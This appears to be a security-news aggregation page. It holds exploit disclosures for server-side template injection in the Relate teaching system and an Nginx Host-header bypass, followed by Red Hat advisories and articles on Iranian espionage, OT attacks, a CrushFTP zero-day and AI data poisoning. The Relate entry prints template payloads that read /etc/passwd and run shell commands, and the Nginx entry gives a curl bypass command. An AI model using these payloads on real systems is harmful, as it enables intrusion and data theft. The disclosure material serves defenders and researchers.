Relate Learning and Teaching System versions prior to 2024.1 suffers from a server-side template injection vulnerability that leads to remote code execution. This particular finding targets the Batch-Issue Exam Tickets function.

    # Exploit Title: Relate Learning And Teaching system Version before 2024.1 SSTI(Batch-Issue Exam Tickets function) lead to RCE# Date: 24/04/2024# Exploit Author: kai6u# Vendor Homepage: https://github.com/inducer/# Software Link: https://github.com/inducer/relate# Affected Version:before 2024.1 (https://github.com/inducer/relate/commit/2fdbd4480a2d0a45c746639be244a61a0d4112b6)# Fixed Version:2024.1 (https://github.com/inducer/relate/commit/d9fa7dcb84b8e5a64ce78ced4f56cdd61c0d59aa)# Tested on: Ubuntu 22.04# Summary:SSTI in Batch-Issue Exam Tickets function of Relate Learning And Teaching system# Description:* 【Prerequisite】 * The attacker has stolen the privilege to issue exam tickets. For example, attacker is logged in as an course administrator.* SSTI is in the `Batch-Issue Exam Tickets` feature, which allows user to specify the format in which tickets are distributed and uses a Django (Jinja2) template internally.1) First, the attacker uses the Ticket Format feature to plant the following payload. * Payload: * `{{ 'abc'.__class__.__base__.__subclasses__()[111].__subclasses__()[0].__subclasses__()[0]('/etc/passwd').read() }}` * Note that the subclasses index number in the payload depends on the python version, so it must be changed depending on the environment.2) Click an Issue Ticket including the above payload.* Then you will see that the contents of the `/etc/passwd` file are output at the after Ticket Code block.3) Next, the attacker modifies the above payload to execute arbitrary commands by changing the subclasses index number to the number of popen. * Payload: * `{{ 'abc'.__class__.__base__.__subclasses__()[210]('whoami',shell=True,stdout=-1).communicate()[0].strip() }}`4) Click an Issue Ticket including the above payload.* If you check the results, you will see that `ubuntu` is displayed, which is the result of executing the whoami command.* An attacker can use this feature to execute reverse shell.# Referenceshttps://book.hacktricks.xyz/v/jp/pentesting-web/ssti-server-side-template-injection

Relate Learning And Teaching System SSTI / Remote Code Execution

Nginx versions 1.25.5 and below appear to have a host header filtering validation bug that could possibly be used for malice.

    # Nginx =< 1.25.5 $host variable validation bug## Intro:In the "Host" header sent to Nginx web server you can't just insert a dot or something like that, because a filtering rules exists there. The ngx_http_validate_host function is responsible for filtering (https://github.com/nginx/nginx/blob/master/src/http/ngx_http_request.c#L2145).## What it validates:+ ﻿﻿two dots in a row are not allowed+ colon and everything after it are stripped off+ ﻿﻿if "Host" header starts with "[", then after "]" everything is deleted+ ﻿﻿path separators are not allowed+ ﻿﻿cannot send chars ≤ 0x20 and == 0x7f+ ﻿﻿if there is a dot at the end, it is removed+ ﻿﻿if after all deletions the host length is zero, error occurs## The bug itself: dot_pos can be greater than host_len, if the last dot is included in the strip, then the last unstripped character (first dot in this case) is not deleted.So, if "Host" header payload is .:. , the colon and dot after it are stripped, but the first dot remains untouched and Nginx $host variable now contains only single dot character, what can't be done in the normal conditions.## Vulnerable Nginx server configuration example:server { root /sites/$host; index index.html; server_name _; location / { try_files $uri $uri/ =404; }}server { server_name ""; location / { return 418 "I'm a teapot."; }}server { root /sites/protected-host.example.com; index flag.html; server_name protected-host.example.com; auth_basic "Protected File Storage"; auth_basic_user_file /.htpasswd; location / { try_files $uri $uri/ =404; }}## Exploit (unauthorized access to password-protected host in this case):curl -H "Host: .:." http://protected-host.example.com/protected-host.example.com/flag.htmlP.S.The bug was sent to security-alert@nginx.org, but the Nginx dev team said that ngx_http_validate_host function is a filter against fools and not a security bug at all, so it was decided to make it as a task on CTF Tinkoff contest.

Nginx 1.25.5 Host Header Validation

Red Hat Security Advisory 2024-2033-03 - An update for libreswan is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2033.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libreswan security and bug fix updateAdvisory ID:        RHSA-2024:2033-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:2033Issue date:         2024-04-24Revision:           03CVE Names:          CVE-2024-2357====================================================================Summary: An update for libreswan is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Libreswan is an implementation of IPsec and IKE for Linux. IPsec is the Internet Protocol Security and uses strong cryptography to provide both authentication and encryption services. These services allow you to build secure tunnels through untrusted networks such as virtual private network (VPN).Security Fix(es):* libreswan: Missing PreSharedKey for connection can cause crash (CVE-2024-2357)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-2357References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2268952

Red Hat Security Advisory 2024-2033-03

Red Hat Security Advisory 2024-2004-03 - An update for kernel is now available for Red Hat Enterprise Linux 7. Issues addressed include null pointer and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2004.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel security and bug fix update  
Advisory ID:        RHSA-2024:2004-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:2004  
Issue date:         2024-04-23  
Revision:           03  
CVE Names:          CVE-2020-36558  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security fixes:

* kernel: use after free in unix_stream_sendpage (CVE-2023-4622)

* Kernel: bluetooth: Unauthorized management command execution (CVE-2023-2002)

* kernel: irdma: Improper access control (CVE-2023-25775)

* kernel: net/sched: sch_hfsc UAF (CVE-2023-4623)

* kernel: race condition in VT_RESIZEX ioctl when vc_cons[i].d is already NULL leading to NULL pointer dereference (CVE-2020-36558)

This update also fixes the following bugs:

* NFS client closes active connection (RHEL-22193)

* kernel panic at __list_del_entry from smb2_reconnect_server (RHEL-26301)

* kernel: race condition when call to VT_RESIZEX ioctl and vc_cons[i].d is already NULL, causing a NULL pointer dereference. (RHEL-28639)

* kernel: net/sched: sch_hfsc UAF (RHEL-16458)

* kernel: irdma: Improper access control (RHEL-6299)

* The message in RHEL 7 ?stack-protector: Kernel stack is corrupted in:? is triggered because perf_trace_buf_prepare() does not verify that per_cpu array perf_trace_buf has allocated per_cpu buffers in it. (RHEL-18052)

* [rhel7] gfs2: Invalid metadata access in punch_hole (RHEL-28785)

* UDP packets dropped due to SELinux denial (RHEL-27751)

* Boot fails with kernel panic at acpi_device_hid+0x6 (RHEL-8721)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2020-36558

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2112693  
https://bugzilla.redhat.com/show_bug.cgi?id=2187308  
https://bugzilla.redhat.com/show_bug.cgi?id=2231410  
https://bugzilla.redhat.com/show_bug.cgi?id=2237757  
https://bugzilla.redhat.com/show_bug.cgi?id=2237760

Red Hat Security Advisory 2024-2004-03

Red Hat Security Advisory 2024-2003-03 - An update for kernel-rt is now available for Red Hat Enterprise Linux 7. Issues addressed include null pointer and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2003.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel-rt security update  
Advisory ID:        RHSA-2024:2003-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:2003  
Issue date:         2024-04-23  
Revision:           03  
CVE Names:          CVE-2020-36558  
====================================================================

Summary: 

An update for kernel-rt is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: use after free in unix_stream_sendpage (CVE-2023-4622)

* kernel: race condition in VT_RESIZEX ioctl when vc_cons[i].d is already NULL leading to NULL pointer dereference (CVE-2020-36558)

* kernel: bluetooth: Unauthorized management command execution (CVE-2023-2002)

* kernel: net/sched: sch_hfsc UAF (CVE-2023-4623)

* kernel: irdma: Improper access control (CVE-2023-25775)

Bug Fix(es):

* kernel-rt: Update RT source tree to the latest RHEL-7.9z30 batch [rhel-7.9.z] (JIRA:RHEL-26440)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2020-36558

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2112693  
https://bugzilla.redhat.com/show_bug.cgi?id=2187308  
https://bugzilla.redhat.com/show_bug.cgi?id=2231410  
https://bugzilla.redhat.com/show_bug.cgi?id=2237757  
https://bugzilla.redhat.com/show_bug.cgi?id=2237760

Red Hat Security Advisory 2024-2003-03

Red Hat Security Advisory 2024-1998-03 - An update for libreswan is available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1998.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libreswan security updateAdvisory ID:        RHSA-2024:1998-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1998Issue date:         2024-04-23Revision:           03CVE Names:          CVE-2024-2357====================================================================Summary: An update for libreswan is available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Libreswan is an implementation of IPsec and IKE for Linux. IPsec is the Internet Protocol Security and uses strong cryptography to provide both authentication and encryption services. These services allow you to build secure tunnels through untrusted networks such as virtual private network (VPN).Security Fix(es):* libreswan: Missing PreSharedKey for connection can cause crash (CVE-2024-2357)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-2357References:https://access.redhat.com/security/updates/classification/#moderate

Red Hat Security Advisory 2024-1998-03

A state-sponsored hacking team employed a clever masquerade and elaborate back-end infrastructure as part of a five-year info-stealing campaign that compromised the US State and Treasury Departments, and hundreds of thousands of accounts overall.

Source: Joe Quinn via Alamy Stock Photo

An elite team of Iranian state-sponsored hackers successfully infiltrated hundreds of thousands of employee accounts at US companies and government agencies, according to the Feds, as part of a multiyear cyber espionage campaign aimed at stealing military secrets.

The US Departments of Treasury and State are among those compromised in the elaborate campaign, which lasted from 2016 to 2021 according to a US Justice Department indictment unsealed this week. Various defense contractors with high-level security clearances, a New York-based accounting firm, and a New York-based hospitality company were also affected, according to the documents.

In all, more than a dozen entities and hundreds of thousands of employee accounts were compromised in the attacks, including more than 200,000 accounts at the hospitality victim.

**Iran's State-Sponsored, Elaborate Social Engineering Efforts**

Four Iranian nationals — including one alleged member of the government's Islamic Revolutionary Guard Corps (IRGC) Electronic Warfare division — have been indicted for the attacks. The defendants are accused of posing as an Iran-based company that purported to provide "cybersecurity services" in a series of spearphishing overtures to their targets. Their aim was to trick email recipients into clicking on a malicious link that executed an unnamed custom malware and allowed account takeover.

In one case, they managed to allegedly take over an administrator email account at a defense contractor, which they then used to create other unauthorized accounts in order to send spearphishing emails to employees of a different defense contractor and a consulting firm.

In some cases, they also successfully posed as women interested in romantic connections, targeting victims through social media connections. This gambit was also aimed at eventually deploying malware onto victim computers, according to the indictment (PDF).

Both approaches align with Iran's long-standing MO of creating clever social-engineering campaigns to gain targets' confidence. A recent Charming Kitten effort for example involved the creation of an entire phony webinar platform to compromise its targeted victims. In general, Iran-nexus threat actors are "more advanced and more sophisticated by a significant margin" in their social-engineering efforts, according to Steven Adair, co-founder and president of Volexity, speaking after disclosing the Charming Kitten campaign. "It's a level of effort and dedication ... that is definitely different and uncommon."

**The Extent of Data Compromise Is Unclear**

In the campaign revealed this week, once the accounts were compromised, the hacking team allegedly used a complex back-end infrastructure and a custom application called "Dandelion" to manage the attack. Dandelion provided a dashboard that enumerated the victims, their IP addresses, physical locations, Web browsers, and OS; whether they clicked on the malicious spearphishing links; and whether the accounts should be targeted for further activity.

The Justice Department did not publicize many other details on the effort; nor did it reveal whether the state-sponsored attackers were able to access and steal classified data. Thus, the level of compromise they were able to achieve in the five years they lurked within the high-value networks remains unclear.

Unfortunately, jailtime will likely not be on offer in the event of a conviction in the case: Hossein Harooni (حسین هارونی), Reza Kazemifar (رضا کاظمی فر), Komeil Baradaran Salmani (کمیل برادران سلمانی), and Alireza Shafie Nasab (علیرضا شفیعی نسب) all remain at large. The State Department is offering a reward of up to $10 million for information that could help with their apprehension.

**About the Author(s)**

Tara Seals has 20+ years of experience as a journalist, analyst and editor in the cybersecurity, communications and technology space. Prior to Dark Reading, Tara was Editor in Chief at Threatpost, and prior to that, the North American news lead for Infosecurity Magazine. She also spent 13 years working for Informa (formerly Virgo Publishing), as executive editor and editor-in-chief at publications focused on both the service provider and the enterprise arenas. A Texas native, she holds a B.A. from Columbia University, lives in Western Massachusetts with her family and is on a never-ending quest for good Mexican food in the Northeast.

Iran Dupes US Military Contractors, Gov't Agencies in Years-Long Cyber Campaign

Attacks increased by "only" 19% last year. But that number is expected to grow significently.

Andrew Ginter, Vice President of Industrial Security, Waterfall Security Solutions

April 24, 2024

4 Min Read

Source: Nicholas Klein via Alamy Stock Photo

COMMENTARY

Waterfall Security Solutions, in collaboration with ICS Strive, recently released its "2024 Threat Report." The bad news is that, in 2023, there were 68 cyberattacks that took down more than 500 physical operations. The good news (sort of) is that this is only 19% more attacks than the previous year. What's going on? Ransomware attacks with physical consequences are down slightly, hacktivist attacks are constant, and everything else is increasing. The report's authors conclude that the 19% increase is most likely an aberration, and that we'll see an increase closer to 90% to 100% in 2024.

**The Details**

Waterfall's operational technology (OT) security threat report is the most cautious in the industry — it tracks only deliberate cyberattacks that caused physical consequences in building automation, heavy industry, manufacturing, and critical industrial infrastructures in the public record. That is, no private or confidential disclosures. The complete data set for the report is included in its appendix. This means the report is certain to be an underestimate of what's really happening in the world, because the authors report regular confidential disclosures that they cannot include in their counts.

OT incidents since 2010. Source: "2024 Threat Report," Waterfall Security Solutions, in collaboration with ICS Strive

**More Attacks**

In spite of this underestimate, cyberattacks that met the inclusion criteria continue to increase, nearly doubling annually since 2019. This is a big change from 2010–2019, when OT attacks with physical consequences were flat, bouncing around between zero and five attacks annually.

Threat actors. Source: "2024 Threat Report," Waterfall Security Solutions, in collaboration with ICS Strive

What are these attacks? In 24 of 68 cases, there was not enough information in the public record to attribute the attack. Of the remaining, 35 attacks (80%) were ransomware, six (14%) were hacktivists, two were supply chain attacks, and one was attributed to a nation state. The 35 ransomware attacks are down slightly from last year's 41, which is unexpected, given that ransomware attacks on IT networks continue to increase at between 60% to 70% per year, depending on the report. Why? In part, because public reports this year were less detailed, there were many more "unknown" threat actors this year. 

Another factor has to do with the fact that most ransomware attacks that impact physical operations did so only accidentally — either because of "abundance of caution" OT shutdowns, when IT is impaired, or physical operations being dependent on crippled IT infrastructure. In 2023, we saw a material fraction of ransomware criminal groups shift away from encrypting and disabling systems to simply stealing the data and demanding ransoms to destroy the stolen data rather than publish it. With fewer IT systems being crippled through encryption, it looks like fewer OT systems and physical operations are being impaired.

We expect this trend to stabilize in 2024, and for OT impacts due to ransomware to go back to the recently historic norm of nearly doubling annually. Why? Because not all businesses have data they are willing to pay to protect. Such businesses, especially critical infrastructures, may still, however, pay a ransom to restore functionality to crippled systems, so it makes sense that at least some ransomware criminals will not leave money on the table and will continue to cripple servers, in addition to stealing what data they can.

**Supply Chain**

Supply chain attacks with physical consequences showed up this year for the first time in many years. Newag SA was accused of embedding code in its trains to maximize the revenues of authorized repair shops. It is accused of acting to "lock up the train with bogus error codes after some date, or if the train wasn't running for a period of time." Some of the code was found to contain GPS coordinates to confine the behavior to third-party workshops. Newag denies the accusations, blaming "unknown hackers." And in an apparent contractual dispute, ORQA, a manufacturer of first-person view (FPV) virtual reality headsets, had its products locked up by what it describes as a "greedy former contractor."

**Wrapping Up**

There are many other findings in the report: GPS blocking and spoofing is becoming a widespread problem, manufacturing businesses accounted for more than one half of the attacks with outages, hacktivists are targeting critical infrastructures, and there is an alarming batch of near misses, including the many critical infrastructures and utilities  targeted by China's Volt Typhoon "living off the land" campaign. The report also touches on promising new developments on the defensive side, including the Cyber-Informed Engineering Strategy. 

**About the Author(s)**

Vice President of Industrial Security, Waterfall Security Solutions

At Waterfall, Andrew leads a team of experts who work with the world's most secure industrial enterprises. Before Waterfall, he led the development of high-end industrial control system products at Hewlett-Packard, of IT/OT middleware products at Agilent Technologies, and of the world's first industrial SIEM at Industrial Defender. He is the author of two books on industrial / OT cybersecurity, a co-author of the Industrial Internet Security Framework, and a co-author of the UITP report on cybersecurity requirements in rail system tendering. Andrew co-hosts the Industrial Security Podcast and contributes regularly to industrial security standards and best-practice guidance.

2023: A 'Good' Year for OT Cyberattacks

An exploit for the vulnerability allows unauthenticated attackers to escape a virtual file system sandbox to download system files and potentially achieve RCE.

Source: Andre Boukreev via Shutterstock

Virtual file transfer system provider CrushFTP and various security researchers are sounding the alarm about a sandbox escape flaw in the CrushFTP server that attackers already have exploited as a zero-day in attacks against organizations in the US.

CrushFTP is a multiprotocol, multiplatform, cloud-based file transfer server. The security vulnerability, tracked as CVE-2024-4040, is an improper input validation bug in the CrushFTP file transfer server version 11.1. The company unveiled and patched the flaw on April 19 with the release of version 11.1.0 of the product; however, there already were various reports of threat actors hammering the flaw with an existing exploit.

These attacks, which were potentially "politically motivated," were targeted in nature for intelligence gathering and detected at various US entities, according to Crowdstrike's threat hunters Falcon OverWatch and Falcon Intelligence, which published an advisory on Reddit.

**A Developing Attack Scenario for Cloud File Transfer**

The attack scenario is developing, with new research by Tenable published April 23 identifying more than 7,100 CrushFTP servers publicly accessible "based on a Shodan query in a Nuclei template created by h4sh," according to the report. However, "it's unclear how many of these systems are potentially vulnerable," Satnam Narang, a Tenable senior staff research engineer, noted in the post.

Attacks are likely to continue on unpatched servers given that a proof-of-concept (PoC) exploit for the flaw is now publicly available, posted April 23 to GitHub by the researcher who discovered and reported the flaw to CrushFTP, Simon Garrelou of Airbus Community Emergency Response Team (CERT), Narang added.

Other attackers also aim to benefit from all the attention in the flaw, by targeting users with fake PoCs, Narang wrote, noting there already is a repository posted to GitHub that directs users to a third-party site called SatoshiDisk, which requests a payment of 0.00735 bitcoin (around $513) for an alleged exploit.

"It is unlikely that the exploit code will work and we do not expect it to be malicious in nature," Narang wrote. "Instead, it is more likely that the attackers are seeking to make money from the interest in the exploit code for this vulnerability."

**CVE-2024-4040: Potential for RCE**

The vulnerability as described by the vendor is an arbitrary read flaw that allows an attacker with low privileges to escape the server's virtual file system (VFS) sandbox to access and download system files.

However, there is evidence that it is more to the flaw than has so far been reported, Rapid7 researchers noted in a blog post published on April 23.

"Although the vulnerability has been formally described as an arbitrary file read, Rapid7 believes that it can be more accurately categorized as a server-side template injection (SSTI)," Caitlin Condon, Rapid7's director of vulnerability intelligence, wrote in the post.

CVE-2024-4040 is a "fully unauthenticated flaw" and is easy to exploit; successful exploitation allows not only or arbitrary file read as root, but also authentication bypass for administrator account access and full remote code execution (RCE), she observed.

"Successful exploitation allows a remote, unauthenticated attacker to access and potentially exfiltrate all files stored on the CrushFTP instance," Condon wrote.

**Exploit Code Available**

The PoC exploit posted by Garrelou includes two scripts. The first, scan\_host.py, attempts to use the vulnerability to read files outside the sandbox, according to the GitHub post.

"If it succeeds, the script writes Vulnerable to standard output and returns with exit code 1," according to Garrelou. "If exploiting the vulnerability does not succeed, the script writes Not vulnerable and exits with status code 0."

The second script, scan\_logs.py, looks for indicators of compromise in a CrushFTP server installation directory and, upon finding them, will attempt to extract the IP that tried to exploit the server.

**Patch Now for Full Protection**

The best way for organizations with CrushFTP present in their environment to mitigate the situation is to update their systems to the patched version of the product now, the company and security researchers alike advised.

Customers using a front-end demilitarized zone (DMZ) server to process protocols and connections in front of their main CrushFTP instance are afforded partial protection from exploit due to the protocol translation system used in the DMZ, according to CrushFTP.

"A DMZ, however, does not fully protect you, and you must update immediately," the company advised customers in its advisory. One of the factors complicating an organization's detection of exploitation of CVE-2024-4040 is that payloads "can be delivered in many different forms," Rapid7's Condon noted.

"When certain evasive techniques are leveraged, payloads will be redacted from logs and request history, and malicious requests will be difficult to discern from legitimate traffic," she wrote.

For this reason, Rapid7 recommends that CrushFTP customers harden their servers against administrator-level RCE attacks by enabling Limited Server mode with the most restrictive configuration possible. Condon added that they also should use firewalls wherever possible to aggressively restrict which IP addresses are permitted to access CrushFTP services.

**About the Author(s)**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Patch Now: CrushFTP Zero-Day Cloud Exploit Targets US Orgs

Just like you should check the quality of the ingredients before you make a meal, it's critical to ensure the integrity of AI training data.

Source: Nico El Nino via Shutterstock

COMMENTARY

Picture this: It's a Saturday morning, and you made breakfast for your family. The pancakes were golden brown and seemingly tasted OK, but everyone, including you, got sick shortly after eating them. Unbeknown to you, the milk that you used to make the batter expired several weeks ago. The quality of the ingredients impacted the meal, but everything looked fine on the outside.

The same philosophy can be applied to artificial intelligence (AI). Regardless of its purpose, AI's output is directly related to the quality of its input. As the popularity of AI continues to rise, security concerns around the data being fed into AI are coming into question.

A majority of today's organizations are integrating AI into business operations at some capacity — and threat actors are taking note. Over the past few years, a tactic known as AI poisoning has become increasingly prevalent. This new malicious practice involves injecting deceptive or harmful data into AI training sets. The tricky part about AI poisoning is that, despite the input being compromised, the output can initially continue as normal. It isn't until a threat actor gets a firm grip on the data and begins a full-fledged attack that deviations from the norm become obvious. The consequences range from slightly inconvenient to damaging a brand's reputation.

It's a risk affecting organizations of all sizes, even today's most prominent tech vendors. For example, over the past few years, adversaries launched several large-scale attacks to poison Google's Gmail spam filters and even turned Microsoft's Twitter chatbot hostile.

**Defending Against AI Data Poisoning**

Fortunately, organizations can take the following steps to shield AI technologies from potential poisoning.

*   Build a comprehensive data catalog. First, organizations should create a live data catalog that serves as a centralized repository of information that is being fed to its AI systems. Any time new data is added to AI systems, it should be tracked in this index. In addition, the catalog should be able to categorize the data flowing into AI systems by the who, what, when, where, why, and how to ensure transparency and accountability.
    
*   Develop a normal baseline for users and devices interacting with AI data. Once the security and IT teams have a solid understanding of all of the data in AI systems and who has access to it, it's important to develop a baseline of normal user and device behavior.
    

Compromised credentials are one of the easiest ways for cybercriminals to break into networks. All a threat actor has to do is either play a guessing game or buy one of the 24 billion username and password combinations available on the cybercriminal marketplace. Once they have access, a threat actor can easily maneuver their way into accessing AI training datasets.

By establishing user and device baseline behavior, security teams can easily detect abnormalities that might be indicative of an attack. Often, this helps stop a threat actor before an incident escalates into a full-blown data breach. For example, say you have an IT executive who typically works from the New York office and who oversees the AI data training sets. One day, it shows that he is active in another country and is adding large amounts of data to the AI. If your security team already has a baseline of user behavior, they can quickly tell that this is abnormal. Then security could either talk to the executive and verify that he was performing the action or, if he wasn't, temporarily disable his account until the alert is thoroughly investigated to prevent any further damage.

**Taking Responsibility of AI Training Sets**

Just like you should check the quality of the ingredients before you make a meal, it's critical to ensure the integrity of AI training data. AI intelligence is intricately linked to the quality of data it processes. Implementing guidelines, policies, monitoring systems, and improved algorithms plays a pivotal role in ensuring the safety and effectiveness of AI. These measures safeguard against potential threats and empower organizations to harness the transformative potential of AI. It is a delicate balance where organizations must learn to leverage AI's capabilities, while remaining vigilant in the face of the ever-evolving threat landscape.

**About the Author(s)**

CISO, Exabeam

Tyler Farrar is the Chief Information Security Officer (CISO) at Exabeam. He graduated from the United States Naval Academy in 2012, and received his Bachelor of Science in Aerospace Engineering. Tyler continued his education at Robert H. Smith School of Business, where he earned a Master of Business Administration in Accounting and Finance.

Tag

#auth